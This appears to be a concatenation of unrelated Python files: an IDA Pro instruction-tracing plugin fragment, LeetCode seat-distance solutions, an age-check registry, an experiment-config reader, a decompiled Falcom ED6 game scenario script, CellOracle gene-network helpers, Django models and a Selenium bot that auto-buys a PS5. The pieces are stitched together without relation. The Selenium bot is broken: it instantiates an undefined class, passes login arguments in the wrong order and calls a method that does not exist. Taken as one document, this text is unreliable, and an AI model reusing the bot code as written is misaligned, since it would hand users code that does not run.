wanted_hotkey = "Ctrl+Shift+j"
comment = "Coloring to each instruction executed"
help = "Ctrl+Shift+j: Run \n Ctrl+Shift+k: Clean"
def init(self):
return idaapi.PLUGIN_KEEP
def term(self):
pass
def run(self, arg):
clear()
tracing()
idaapi.add_hotkey("Ctrl+Shift+k", clear)
def PLUGIN_ENTRY():
return InstructionTracing()
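# Usage, per the plugin's own help string: drop this file into IDA's plugins
# directory, start a debugger session, then press Ctrl+Shift+j to trace and
# color executed instructions, and Ctrl+Shift+k to clear the coloring.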
|
class Solution1:
def maxDistToClosest(self, seats):
"""
:type seats: List[int]
:rtype: int
"""
i = 0
max_dis = 0
while i < len(seats):
if seats[i] == 1:
i += 1
continue
left = i
while left >= 0 and seats[left] != 1:
left -= 1
right = i
while right < len(seats) and seats[right] != 1:
right += 1
if left == -1:
max_dis = max(max_dis, right - i)
elif right == len(seats):
max_dis = max(max_dis, i - left)
else:
max_dis = max(max_dis, min(i - left, right - i))
i += 1
return max_dis
class Solution:
def maxDistToClosest(self, seats):
"""
:type seats: List[int]
:rtype: int
"""
seated = [idx for idx in range(len(seats)) if seats[idx] == 1]
max_dis = 0
        for idx in range(len(seated) - 1):
            # the best seat in an interior gap is its midpoint, so the
            # achievable distance is half the gap (floor division)
            dis = (seated[idx + 1] - seated[idx]) // 2
            max_dis = max(dis, max_dis)
if seats[0] != 1:
max_dis = max(max_dis, seated[0])
if seats[-1] != 1:
max_dis = max(max_dis, len(seats) - seated[-1] - 1)
return max_dis
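# Solution1 rescans left and right from every empty seat, so it is O(n^2) in the
# worst case; Solution collects the occupied indices once and only inspects the
# interior gaps (midpoint distance) and the two edges, which is O(n).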
if __name__ == '__main__':
seats = [1, 0, 0, 0, 1, 0, 1]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 2
seats = [1, 0, 0, 0]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 3
seats = [0, 0, 1, 0, 1, 1]
res = Solution().maxDistToClosest(seats)
print(seats)
assert res == 2
|
from datetime import datetime
from dateutil import relativedelta
class AgeBarrier:
""" Holds various age barrier approaches available to the period. """
registry: dict[str, type['AgeBarrier']] = {}
def __init_subclass__(cls, name, **kwargs):
assert name not in cls.registry
cls.registry[name] = cls
super().__init_subclass__(**kwargs)
@classmethod
def from_name(cls, name, *args, **kwargs):
return cls.registry[name](*args, **kwargs)
def is_too_young(self, birth_date, start_date, min_age):
raise NotImplementedError()
def is_too_old(self, birth_date, start_date, max_age):
raise NotImplementedError()
class ExactAgeBarrier(AgeBarrier, name='exact'):
""" Checks the age by exact date.
The attendee can be 1 year too old (otherwise, the day the attendee
is a day older than the max age, he'll be rejected - in other word
the min age is exclusive, the max age is inclusive).
"""
def age(self, birth_date, start_date):
""" Calculates the age at the given date. """
if isinstance(birth_date, datetime):
birth_date = birth_date.date()
return relativedelta.relativedelta(start_date, birth_date).years
def is_too_young(self, birth_date, start_date, min_age):
return self.age(birth_date, start_date) < min_age
def is_too_old(self, birth_date, start_date, max_age):
return self.age(birth_date, start_date) > max_age
class YearAgeBarrier(AgeBarrier, name='year'):
""" Checks the age by using the year of the start_date and the age.
In German, we would say this is by "Jahrgang".
The person must be of that age during the year of the start date.
"""
def is_too_young(self, birth_date, start_date, min_age):
return (birth_date.year + min_age) > start_date.year
def is_too_old(self, birth_date, start_date, max_age):
return (birth_date.year + max_age + 1) < start_date.year
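# Hedged usage sketch of the registry (dates are illustrative):
#
#   from datetime import date
#   barrier = AgeBarrier.from_name('exact')
#   barrier.is_too_young(date(2012, 5, 1), date(2024, 7, 1), min_age=16)  # True
#   AgeBarrier.from_name('year').is_too_old(date(2000, 1, 1), date(2024, 7, 1), max_age=20)  # True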
|
from ConfigParser import *
import os
import glob
import re
import sys
path = '/run/media/mzanotto/dataFast/renvision/experiments/P38_06_03_14_ret1/t0_modSmall_single_pca_cond_'
f1 = 'input_configuration'
f2 = 'confNumAndMI'
expParams = []
print 'BatchSize | k | Hidden | Delay | LearningRate | Delta | MI | R | MI/R'
for i in range(14,int(sys.argv[1])+1):
print str(i)+'.'
config = ConfigParser()
config.read(path+str(i)+'/'+f1)
    try:
        batch_size = config.getint('MAIN_PARAMETER_SETTING','batch_size')
    except (NoSectionError, NoOptionError):
        # unreadable or missing configuration for this experiment; skip it
        continue
expParams.append(batch_size)
k = config.getint('MAIN_PARAMETER_SETTING','k') # steps in CDk
expParams.append(format(k,'02d'))
n_hidden = config.getint('MODEL_PARAMETER_SETTING','n_hidden')
expParams.append(format(n_hidden,'02d'))
delay = config.getint('MODEL_PARAMETER_SETTING','delay')
expParams.append(format(delay,'02d'))
learning_rate = config.getfloat('MODEL_PARAMETER_SETTING','learning_rate')
expParams.append(format(learning_rate,'.2f'))
## n_gibbs_generate = config.getint('MODEL_PARAMETER_SETTING','n_gibbs_generate') # Gibbs iterations when generating predictions
## expParams.append(n_gibbs_generate)
delta = config.getint('MODEL_PARAMETER_SETTING','delta')
expParams.append(format(delta,'03d'))
with open(path+str(i)+'/'+f2) as f:
M,R = re.findall("\d+\.?\d*" ,f.read())
print expParams,format(float(M),'.3f'),format(int(R),'03d'),format(100*float(M)/float(R),'.3f')
expParams = []
## for file in glob.glob(path+str(i)+"_*"):
## config = ConfigParser()
## config.read(file+'/input_configuration_second_layer')
## batch_size = config.getint('MAIN_PARAMETER_SETTING','batch_size')
## expParams.append(batch_size)
## k = config.getint('MAIN_PARAMETER_SETTING','k') # steps in CDk
## expParams.append(k)
## n_hidden = config.getint('MODEL_PARAMETER_SETTING','n_hidden')
## expParams.append(delay)
## learning_rate = config.getfloat('MODEL_PARAMETER_SETTING','learning_rate')
## expParams.append(learning_rate)
## n_gibbs_generate = config.getint('MODEL_PARAMETER_SETTING','n_gibbs_generate') # Gibbs iterations when generating predictions
## expParams.append(n_gibbs_generate)
## print '-->',expParams
## expParams = []
|
from ED6ScenarioHelper import *
def main():
    # Krone Trail
CreateScenaFile(
FileName = 'C1500 ._SN',
MapName = 'Bose',
Location = 'C1500.x',
MapIndex = 61,
MapDefaultBGM = "ed60022",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'ED6_DT01/C1500 ._SN',
'ED6_DT01/C1500_1 ._SN',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'魔兽', # 9
'魔兽', # 10
'魔兽', # 11
'魔兽', # 12
'魔兽', # 13
'魔兽', # 14
'魔兽', # 15
'魔兽', # 16
'照相机', # 17
'艾丝蒂尔', # 18
'约修亚', # 19
'雪拉扎德', # 20
'古罗尼山道·关所方向', # 21
'西柏斯街道方向', # 22
)
DeclEntryPoint(
Unknown_00 = -130600,
Unknown_04 = -40,
Unknown_08 = 178500,
Unknown_0C = 4,
Unknown_0E = 225,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
Unknown_28 = 2800,
Unknown_2C = 262,
Unknown_30 = 260,
Unknown_32 = 240,
Unknown_34 = 300,
Unknown_36 = 0,
Unknown_38 = 0,
Unknown_3A = 61,
InitScenaIndex = 0,
InitFunctionIndex = 0,
EntryScenaIndex = 0,
EntryFunctionIndex = 1,
)
AddCharChip(
'ED6_DT09/CH10140 ._CH', # 00
'ED6_DT09/CH10141 ._CH', # 01
'ED6_DT07/CH00100 ._CH', # 02
'ED6_DT07/CH00110 ._CH', # 03
'ED6_DT07/CH00120 ._CH', # 04
'ED6_DT07/CH00101 ._CH', # 05
'ED6_DT07/CH00111 ._CH', # 06
'ED6_DT07/CH00121 ._CH', # 07
'ED6_DT07/CH00102 ._CH', # 08
'ED6_DT09/CH10200 ._CH', # 09
'ED6_DT09/CH10201 ._CH', # 0A
'ED6_DT09/CH10880 ._CH', # 0B
'ED6_DT09/CH10881 ._CH', # 0C
'ED6_DT09/CH11160 ._CH', # 0D
'ED6_DT09/CH11161 ._CH', # 0E
'ED6_DT09/CH10870 ._CH', # 0F
'ED6_DT09/CH10871 ._CH', # 10
)
AddCharChipPat(
'ED6_DT09/CH10140P._CP', # 00
'ED6_DT09/CH10141P._CP', # 01
'ED6_DT07/CH00100P._CP', # 02
'ED6_DT07/CH00110P._CP', # 03
'ED6_DT07/CH00120P._CP', # 04
'ED6_DT07/CH00101P._CP', # 05
'ED6_DT07/CH00111P._CP', # 06
'ED6_DT07/CH00121P._CP', # 07
'ED6_DT07/CH00102P._CP', # 08
'ED6_DT09/CH10200P._CP', # 09
'ED6_DT09/CH10201P._CP', # 0A
'ED6_DT09/CH10880P._CP', # 0B
'ED6_DT09/CH10881P._CP', # 0C
'ED6_DT09/CH11160P._CP', # 0D
'ED6_DT09/CH11161P._CP', # 0E
'ED6_DT09/CH10870P._CP', # 0F
'ED6_DT09/CH10871P._CP', # 10
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150000,
Z = 7800,
Y = 63100,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -150300,
Z = 6800,
Y = 90200,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0x1C5,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 2,
ChipIndex = 0x2,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 3,
ChipIndex = 0x3,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 99000,
Z = 0,
Y = 99000,
Direction = 0,
Unknown2 = 0,
Unknown3 = 4,
ChipIndex = 0x4,
NpcIndex = 0x1C1,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -140810,
Z = 6010,
Y = -31010,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = -119390,
Z = -60,
Y = 180920,
Direction = 0,
Unknown2 = 0,
Unknown3 = 0,
ChipIndex = 0x0,
NpcIndex = 0xFF,
InitFunctionIndex = -1,
InitScenaIndex = -1,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclNpc(
X = 0,
Z = 0,
Y = 0,
Direction = 0,
Unknown2 = 0,
Unknown3 = 15,
ChipIndex = 0xF,
NpcIndex = 0x1C5,
InitFunctionIndex = 0,
InitScenaIndex = 2,
TalkFunctionIndex = -1,
TalkScenaIndex = -1,
)
DeclMonster(
X = -146390,
Z = 2009,
Y = 152190,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCA,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -148000,
Z = 2090,
Y = 136280,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154200,
Z = 1990,
Y = 120790,
Unknown_0C = 0,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154710,
Z = 4070,
Y = 99880,
Unknown_0C = 58,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -154180,
Z = 4030,
Y = 76310,
Unknown_0C = 117,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCF,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -162330,
Z = 4019,
Y = 46020,
Unknown_0C = 116,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -135360,
Z = 3950,
Y = 20570,
Unknown_0C = 99,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -131150,
Z = 2040,
Y = 55190,
Unknown_0C = 57,
Unknown_0E = 13,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCC,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclMonster(
X = -151910,
Z = 5910,
Y = -11960,
Unknown_0C = 0,
Unknown_0E = 9,
Unknown_10 = 1,
Unknown_11 = 1,
Unknown_12 = 0xFFFFFFFF,
BattleIndex = 0xCD,
Unknown_18 = 0,
Unknown_1A = 0,
)
DeclEvent(
X = -143900,
Y = 2800,
Z = 74200,
Range = 2000,
Unknown_10 = 0x4B0,
Unknown_14 = 0x0,
Unknown_18 = 0x10040,
Unknown_1C = 0,
)
DeclActor(
TriggerX = -123590,
TriggerZ = 4010,
TriggerY = 89800,
TriggerRange = 1000,
ActorX = -122930,
ActorZ = 5010,
ActorY = 89680,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 3,
Unknown_22 = 0,
)
DeclActor(
TriggerX = -128169,
TriggerZ = 4130,
TriggerY = 22090,
TriggerRange = 1000,
ActorX = -127650,
ActorZ = 5630,
ActorY = 22150,
Flags = 0x7C,
TalkScenaIndex = 0,
TalkFunctionIndex = 4,
Unknown_22 = 0,
)
ScpFunction(
"Function_0_476", # 00, 0
"Function_1_477", # 01, 1
"Function_2_4D5", # 02, 2
"Function_3_4EB", # 03, 3
"Function_4_633", # 04, 4
)
def Function_0_476(): pass
label("Function_0_476")
Return()
# Function_0_476 end
def Function_1_477(): pass
label("Function_1_477")
OP_16(0x2, 0xFA0, 0xFFFBED08, 0xFFFF2540, 0x3003E)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_49B")
OP_6F(0x0, 0)
Jump("loc_4A2")
label("loc_49B")
OP_6F(0x0, 60)
label("loc_4A2")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4B4")
OP_6F(0x1, 0)
Jump("loc_4BB")
label("loc_4B4")
OP_6F(0x1, 60)
label("loc_4BB")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_4CD")
OP_6F(0x0, 0)
Jump("loc_4D4")
label("loc_4CD")
OP_6F(0x0, 60)
label("loc_4D4")
Return()
# Function_1_477 end
def Function_2_4D5(): pass
label("Function_2_4D5")
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_4EA")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_4D5")
label("loc_4EA")
Return()
# Function_2_4D5 end
def Function_3_4EB(): pass
label("Function_3_4EB")
SetMapFlags(0x8000000)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5DA")
OP_22(0x2B, 0x0, 0x64)
OP_70(0x0, 0x3C)
Sleep(500)
Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x1F5, 1)"), scpexpr(EXPR_END)), "loc_561")
FadeToDark(300, 0, 100)
OP_22(0x11, 0x0, 0x64)
SetMessageWindowPos(-1, -1, -1, -1)
SetChrName("")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x0),
"得到了\x07\x02",
"回复药\x07\x00",
"。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
OP_A2(0x372)
Jump("loc_5D7")
label("loc_561")
FadeToDark(300, 0, 100)
SetChrName("")
AnonymousTalk(
(
"宝箱里装有\x07\x02",
"回复药\x07\x00",
"。\x01",
"不过现有的数量太多,\x07\x02",
"回复药\x07\x00",
"不能再拿更多了。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_22(0x2C, 0x0, 0x64)
OP_6F(0x0, 60)
OP_70(0x0, 0x0)
label("loc_5D7")
Jump("loc_625")
label("loc_5DA")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"宝箱里什么东西都没有。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_83(0xF, 0x17)
label("loc_625")
Sleep(30)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
# Function_3_4EB end
def Function_4_633(): pass
label("Function_4_633")
SetMapFlags(0x8000000)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x6E, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_7EE")
OP_22(0x2B, 0x0, 0x64)
OP_70(0x1, 0x3C)
Sleep(500)
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x72, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_715")
OP_9F(0x16, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
SetChrPos(0x16, -128169, 4130, 22090, 320)
TurnDirection(0x16, 0x0, 0)
def lambda_682():
OP_8F(0xFE, 0xFFFE0B57, 0x1022, 0x564A, 0x4B0, 0x0)
ExitThread()
QueueWorkItem(0x16, 1, lambda_682)
def lambda_69D():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x4B0)
ExitThread()
QueueWorkItem(0x16, 2, lambda_69D)
ClearChrFlags(0x16, 0x80)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"魔兽出现了!\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
Battle(0xD0, 0x0, 0x0, 0x0, 0xFF)
SetChrFlags(0x16, 0x80)
Switch(
(scpexpr(EXPR_PUSH_VALUE_INDEX, 0x3), scpexpr(EXPR_END)),
(0, "loc_6F0"),
(2, "loc_702"),
(1, "loc_712"),
(SWITCH_DEFAULT, "loc_715"),
)
label("loc_6F0")
OP_A2(0x396)
OP_6F(0x1, 60)
Sleep(500)
Jump("loc_715")
label("loc_702")
OP_6F(0x1, 0)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
label("loc_712")
OP_B4(0x0)
Return()
label("loc_715")
Jc((scpexpr(EXPR_EXEC_OP, "OP_3E(0x133, 1)"), scpexpr(EXPR_END)), "loc_76F")
FadeToDark(300, 0, 100)
OP_22(0x11, 0x0, 0x64)
SetMessageWindowPos(-1, -1, -1, -1)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x0),
"得到了\x07\x02",
"珍珠耳环\x07\x00",
"。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
SetMessageWindowPos(72, 320, 56, 3)
FadeToBright(300, 0)
OP_A2(0x373)
Jump("loc_7EB")
label("loc_76F")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
"宝箱里装有\x07\x02",
"珍珠耳环\x07\x00",
"。\x01",
"不过现有的数量太多,\x07\x02",
"珍珠耳环\x07\x00",
"不能再拿更多了。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_22(0x2C, 0x0, 0x64)
OP_6F(0x1, 60)
OP_70(0x1, 0x0)
label("loc_7EB")
Jump("loc_832")
label("loc_7EE")
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"宝箱里什么东西都没有。\x07\x00\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_83(0xF, 0x18)
label("loc_832")
Sleep(30)
TalkEnd(0xFF)
ClearMapFlags(0x8000000)
Return()
# Function_4_633 end
SaveToFile()
Try(main)
|
# -*- coding: utf-8 -*-
'''
This is a series of custom functions for inferring GRNs from single-cell RNA-seq data.
Codes were written by Kenji Kamimoto.
'''
###########################
### 0. Import libraries ###
###########################
# 0.1. libraries for fundamental data science and data processing
import os
import numpy as np
import pandas as pd
from scipy import stats
from tqdm.notebook import tqdm
from ..network.net_core import Net
from ..utility import standard
from .links_object import Links
from ..trajectory.oracle_utility import _adata_to_df, _get_clustercolor_from_anndata
RIDGE_SOLVER = "auto"
########################################
### Construct cluster specific GRNs ###
########################################
def get_links(oracle_object, cluster_name_for_GRN_unit=None, alpha=10, bagging_number=20, verbose_level=1, test_mode=False, model_method="bagging_ridge"):
"""
Make GRN for each cluster and returns results as a Links object.
Several preprocessing should be done before using this function.
Args:
oracle_object (Oracle): See Oracle module for detail.
cluster_name_for_GRN_unit (str): Cluster name for GRN calculation. The cluster information should be stored in Oracle.adata.obs.
        alpha (float or int): The strength of the regularization.
            A lower value increases sensitivity, letting you detect weaker network connections, but may admit more noise.
            A higher value reduces the chance of overfitting.
        bagging_number (int): The number of resampled model fits used in the bagging calculation.
        verbose_level (int): If verbose_level > 1, the most detailed progress information is shown.
            If verbose_level > 0, a single progress bar is shown.
            If verbose_level == 0, no progress bar is shown.
        test_mode (bool): If True, the GRN calculation is done for only one cluster rather than for all clusters.
        model_method (str): Choice of modeling algorithm, either "bagging_ridge" or "bayesian_ridge".
"""
if model_method not in ["bagging_ridge", "bayesian_ridge"]:
raise ValueError("model_mothod error. Please set 'bagging_ridge' or 'bayesian_ridge'.")
if cluster_name_for_GRN_unit is None:
cluster_name_for_GRN_unit = oracle_object.cluster_column_name
# calculate GRN for each cluster
linkLists = _fit_GRN_for_network_analysis(oracle_object, cluster_name_for_GRN_unit=cluster_name_for_GRN_unit,
alpha=alpha, bagging_number=bagging_number, verbose_level=verbose_level, test_mode=test_mode,
model_method=model_method)
# initiate links object
links = Links(name=cluster_name_for_GRN_unit,
links_dict=linkLists)
    # extract color information
links.palette = _get_clustercolor_from_anndata(adata=oracle_object.adata,
cluster_name=cluster_name_for_GRN_unit,
return_as="palette")
#links.merge_links()
links.ALPHA_used = alpha
links.model_method = model_method
return links
def _fit_GRN_for_network_analysis(oracle_object, cluster_name_for_GRN_unit, alpha=10, bagging_number=20,
verbose_level=1, test_mode=False, model_method="bagging_ridge"):
# extract information from oracle_object
gem_imputed = _adata_to_df(oracle_object.adata, "imputed_count")
gem_imputed_std = standard(gem_imputed)
cluster_info = oracle_object.adata.obs[cluster_name_for_GRN_unit]
linkLists = {}
# setting about verbose
if verbose_level < 0:
raise ValueError("varbose_level should be positive number.")
elif verbose_level == 0:
loop = np.unique(cluster_info)
verbose = False
else:
loop = tqdm(np.unique(cluster_info))
if verbose_level <= 1:
verbose = False
else:
verbose = True
First = True
for cluster in loop:
        if (not test_mode) or First:
First = False
if verbose:
print(f"inferring GRN for {cluster}...")
cells_in_the_cluster_bool = (cluster_info == cluster)
gem_ = gem_imputed[cells_in_the_cluster_bool]
gem_std = gem_imputed_std[cells_in_the_cluster_bool]
tn_ = Net(gene_expression_matrix=gem_,
gem_standerdized=gem_std,
TFinfo_dic=oracle_object.TFdict,
verbose=False)
tn_.fit_All_genes(bagging_number=bagging_number,
model_method=model_method,
alpha=alpha, verbose=verbose)
#oracle_object.linkMat[cluster] = tn_.returnResultAs_TGxTFs("coef_abs")
tn_.updateLinkList(verbose=False)
linkLists[cluster] = tn_.linkList.copy()
return linkLists
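# Hedged usage sketch (assumes an already-preprocessed CellOracle `oracle`
# object whose adata.obs has a "louvain" cluster column; names illustrative):
#
#   links = get_links(oracle, cluster_name_for_GRN_unit="louvain",
#                     alpha=10, bagging_number=20, verbose_level=1)
#   links.ALPHA_used    # -> 10
#   links.links_dict    # per-cluster link tables, keyed by cluster name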
|
#!/usr/bin/env python
# -*- coding=utf-8 -*-
from django.db import models
# Create your models here.
class ServiceInfo(models.Model):
    service = models.CharField(max_length=200, verbose_name="product line")
    cluster_name = models.CharField(max_length=200, verbose_name="cluster name")
    install_path = models.CharField(max_length=200, blank=True, verbose_name="install path")
    def __str__(self):
        return self.service + "_" + self.cluster_name
class FileInfo(models.Model):
    service_info = models.ForeignKey(ServiceInfo, on_delete=models.CASCADE)  # on_delete is required on Django >= 2.0
    salt_path = models.CharField(max_length=200, unique=True, verbose_name="git path")
    target_path = models.CharField(max_length=200, verbose_name="local path")
    auth = models.CharField(max_length=200, verbose_name="permissions")
    user_group = models.CharField(max_length=200, verbose_name="owner group")
    user = models.CharField(max_length=200, verbose_name="user")
    md5 = models.CharField(max_length=200, verbose_name="md5 value")
    update_time = models.CharField(max_length=200, verbose_name="update time")
    def __str__(self):
        return self.salt_path
class OperationRecord(models.Model):
    salt_path = models.CharField(max_length=200, verbose_name="local path")
    action = models.CharField(max_length=200, verbose_name="action")
    operate_time = models.CharField(max_length=200, verbose_name="operation time")
    file_info_id = models.CharField(max_length=200, verbose_name="file id")
    def __str__(self):
        return self.salt_path
|
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class PrepaidGamer:
    def __init__(self):
        webOptions = webdriver.ChromeOptions()
        webOptions.add_argument("start-maximized")
        webOptions.add_argument("disable-infobars")
        self.driver = webdriver.Chrome(executable_path=r"/pathtothechromedriver", options=webOptions)
def login(self,email,password,url):
self.driver.get(url)
login_email = self.driver.find_element_by_xpath("//input[@id='username']")
login_email.send_keys(email)
        login_password = self.driver.find_element_by_xpath("//input[@id='password']")
login_password.send_keys(password)
loginButton = self.driver.find_element_by_xpath("//button[(.)='Log in']")
loginButton.click()
time.sleep(1)
def addToCart(self,url):
self.driver.get(url)
        addToCart = False
while not addToCart:
try:
addToCartButton = self.driver.find_element_by_xpath("//button[(.)='Add to cart']")
addToCartButton.click()
addToCart = True
except:
self.driver.refresh()
time.sleep(0.5)
def checkout(self,upi):
proceedToCheckout = self.driver.find_element_by_xpath("//a[contains(@class,'checkout') and contains((.),'Proceed to checkout')]")
proceedToCheckout.click()
time.sleep(1)
upiCheck = self.driver.find_element_by_xpath("//input[@id='payment_method_wc-upi']")
upiCheck.click()
time.sleep(0.5)
upiAddress = self.driver.find_element_by_xpath("//input[@id='upiwc-address']")
upiAddress.send_keys(upi)
payButton = self.driver.find_element_by_xpath("//button[(.)='Place Order']")
payButton.click()
if __name__=="__main__":
autoBuyBot = RelianceDigital()
email = ""
password = ""
upi = ""
autoBuyBot.login("https://prepaidgamercard.com/my-account/",email,password)
autoBuyBot.add_to_cart("https://prepaidgamercard.com/product/playstation-5-digital-edition-ps5/")
#use this for disc edition :
autoBuyBot.checkout(upi) |
a = 'This is test naive.py file...'
